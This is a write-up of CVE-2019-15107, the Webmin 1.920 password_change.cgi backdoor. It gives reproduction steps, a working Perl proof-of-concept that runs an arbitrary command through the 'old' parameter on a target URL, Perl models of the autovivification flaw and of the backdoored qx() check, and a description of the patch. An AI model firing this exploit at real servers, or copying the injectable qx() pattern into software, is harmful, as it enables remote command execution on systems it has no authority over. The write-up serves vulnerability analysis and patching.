CVE-2019-15107: RCE in Webmin <= 1.920 via password_change.cgi (password change)

# 0x01 Reproduce

• webmin 1.920
• Ubuntu

To reproduce this vulnerability, password changing must be enabled first: in Webmin Configuration -> Authentication, turn on the option that allows users with expired passwords to change them.

You can confirm the setting in /etc/webmin/miniserv.conf, where passwd_mode now has the value 2; password_change.cgi refuses to run unless that value is set.

Then submit the password-change form and capture the POST request to password_change.cgi with a proxy.

Set the parameter old to a value such as |ifconfig; the command output comes back in the error page.
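The captured request, as an added Perl script that is not part of the original post or of Webmin. It assumes a lab instance of Webmin 1.920 with passwd_mode=2 reachable at the URL given as the first argument; the parameter names follow the password-change form, the new1/new2 values are arbitrary, and the Referer value is an assumption about what Webmin's referer check accepts.

```perl
#!/usr/bin/perl
# Added example, not from the original post or from Webmin: sends the
# password_change.cgi request described above to a lab instance of
# Webmin 1.920 that has passwd_mode=2, and prints the command output that
# comes back in the error page. The target URL and the command are
# arguments; the parameter names follow the password-change form, and
# the Referer value is an assumption about what the referer check accepts.
use strict;
use warnings;
use HTTP::Tiny;

my ($base, $cmd) = @ARGV;
die "usage: $0 https://target:10000 'command'\n" unless $base && $cmd;
$base =~ s{/+\z}{};

# Webmin ships with a self-signed certificate; verification is off for the lab only.
my $http = HTTP::Tiny->new(verify_SSL => 0, timeout => 15);

my $resp = $http->post_form(
    "$base/password_change.cgi",
    {
        user    => 'root',      # any name works (see 0x02); root is just conventional
        pam     => '',
        expired => 2,
        old     => $cmd,        # this value ends up inside qx/.../ on the server
        new1    => 'Passw0rd!',
        new2    => 'Passw0rd!', # must match new1 to get past the input checks
    },
    # Webmin checks the Referer of form submissions against its own host.
    { headers => { Referer => "$base/session_login.cgi" } },
);

print "HTTP $resp->{status} $resp->{reason}\n";
die "request failed: $resp->{content}\n" if $resp->{status} == 599;  # transport error

# The error page embeds the command output inside HTML; strip the tags.
(my $text = $resp->{content}) =~ s/<[^>]+>//g;
$text =~ s/^\s*\n//mg;
print $text;
```

Run it as `perl poc.pl https://target:10000 id` against a lab box only. A leading pipe in the command is not required, as the analysis below explains.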

# 0x02 Analysis

The code first checks whether the parameter user names a Webmin user, by grepping the list returned by acl::list_users() for an entry whose name matches. If a Webmin user named root exists and we send user=root, $wuser holds that user's record. If we send user=xxxx, nothing matches and $wuser is still undef after the grep.

However, the very next statement reads $wuser->{'pass'}. Dereferencing an undefined scalar as a hash autovivifies it, so $wuser silently changes from undef to {}. An empty hash reference is true in boolean context, so the following if ($wuser) test passes.

So whatever value user carries, execution reaches the code segment that updates a Webmin user's password:

• user=root

• user=noexists_user
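The two cases above, as an added stand-alone Perl model that is not the page's or Webmin's code. The user records are constructed; only the shape of the lookup (grep, then $wuser->{'pass'}, then if ($wuser)) follows password_change.cgi. The fixed_lookup variant, which checks definedness before dereferencing, is added here to show what stops the autovivification; it is not the change Webmin shipped.

```perl
#!/usr/bin/perl
# Added example, not the page's or Webmin's code: a stand-alone model of
# the "is this a Webmin user?" lookup in password_change.cgi, showing why
# the password-update branch is entered even for a name that is not in
# the user list. The user records are constructed; only the shape of the
# lookup (grep, then $wuser->{'pass'}, then if ($wuser)) follows Webmin.
use strict;
use warnings;
use Data::Dumper;
$Data::Dumper::Terse    = 1;
$Data::Dumper::Indent   = 0;
$Data::Dumper::Sortkeys = 1;

# Constructed stand-in for the list returned by &acl::list_users().
my @users = (
    { name => 'root',  pass => '$1$constructed$hashvalue' },
    { name => 'alice', pass => 'x' },   # 'x' = authenticate against Unix
);

# Lookup as written in the vulnerable version.
sub vulnerable_lookup {
    my ($name) = @_;
    no warnings 'uninitialized';       # Webmin runs without warnings
    my ($wuser) = grep { $_->{'name'} eq $name } @users;
    # For an unknown name $wuser is undef here, but using it as a hash
    # reference autovivifies it: after this line $wuser is {}.
    if ($wuser->{'pass'} eq 'x') {
        $wuser = undef;                # Unix auth, not a Webmin password
    }
    return $wuser;                     # {} is true, so if ($wuser) passes
}

# Same lookup with a definedness check, so nothing autovivifies
# (illustrative fix, not the one Webmin shipped).
sub fixed_lookup {
    my ($name) = @_;
    my ($wuser) = grep { $_->{'name'} eq $name } @users;
    if (defined $wuser && $wuser->{'pass'} eq 'x') {
        $wuser = undef;
    }
    return $wuser;                     # undef stays undef for unknown names
}

for my $name (qw(root alice noexists_user)) {
    my $v = vulnerable_lookup($name);
    my $f = fixed_lookup($name);
    printf "user=%-14s vulnerable: if(\$wuser) is %-5s value %s\n",
        $name, ($v ? 'true' : 'false'), Dumper($v);
    printf "%-19s fixed:      if(\$wuser) is %-5s value %s\n",
        '', ($f ? 'true' : 'false'), Dumper($f);
}
```

For user=root both variants return the record; for user=alice both return undef because the account uses Unix authentication; for user=noexists_user the vulnerable lookup returns {} and the branch is entered, while the checked lookup returns undef.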

Now let's look at password_change.cgi, lines 37 to 40:

The implementation of encrypt_password does not matter here. What matters is how Webmin builds the error message when the old password does not match.

Webmin simply interpolates our parameter old into qx/.../, which hands the value to the shell and captures its output.

pass_error then prints the result of that command in the error page:

So, in conclusion, there is no need for a vertical bar (|): the whole value of old is executed as a command, and setting old to ifconfig alone is enough.

By the way, there is a related issue on GitHub: https://github.com/webmin/webmin/issues/947

# 0x03 Patch

Webmin 1.930 fixes this vulnerability by removing the qx() backdoor from the error path, so the error message no longer carries the output of a command built from old:
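The backdoored check from section 0x02 next to the form the patch restores, as an added stand-alone Perl model that is not the page's or Webmin's code. encrypt_password and pass_error are hypothetical stand-ins for the Webmin functions of the same name (the real hashing scheme is irrelevant, as noted above), and the stored user record and the inputs are constructed.

```perl
#!/usr/bin/perl
# Added example, not the page's or Webmin's code: a stand-alone model of
# the old-password check that follows the user lookup, once in the
# backdoored form (qx/$in{'old'}/ passed to pass_error) and once in the
# form the patch restores. encrypt_password and pass_error are
# hypothetical stand-ins for the Webmin functions of the same name, and
# the stored user record and inputs are constructed.
use strict;
use warnings;
use Digest::SHA qw(sha256_hex);

# Stand-in for &acl::encrypt_password; the real scheme does not matter here.
sub encrypt_password { return sha256_hex($_[0]); }

# Stand-in for &pass_error: Webmin prints its arguments on the error page,
# so a second argument reaches the client verbatim.
sub pass_error { return "Error: " . join('', @_); }

my %wuser = (name => 'root', pass => encrypt_password('correct-old-password'));

# Backdoored check: 'old' is interpolated into qx/.../ and run by the shell
# whenever the comparison fails, i.e. for any value that is not the password.
sub check_old_vulnerable {
    my (%in) = @_;
    my $enc = encrypt_password($in{'old'});
    return 'ok' if $enc eq $wuser{'pass'};
    return pass_error('Old password is incorrect. ', qx/$in{'old'}/);
}

# Patched check: only the fixed message is passed; 'old' is never executed.
sub check_old_fixed {
    my (%in) = @_;
    my $enc = encrypt_password($in{'old'});
    return 'ok' if $enc eq $wuser{'pass'};
    return pass_error('Old password is incorrect.');
}

# Constructed inputs: the right password, a wrong one (which the vulnerable
# version still tries to execute), and commands in place of the password.
# No pipe is needed; a pipe merely turns the value into a shell pipeline.
for my $old ('correct-old-password', 'notthepassword', 'id', 'echo hi | tr a-z A-Z') {
    print "old='$old'\n";
    print "  vulnerable -> ", check_old_vulnerable(old => $old), "\n";
    print "  fixed      -> ", check_old_fixed(old => $old), "\n";
}
```

With old=id the vulnerable variant returns the error message followed by the output of id, while the patched variant returns the message alone; the wrong-password case shows that the backdoor runs whatever string is supplied, not only values that look like commands.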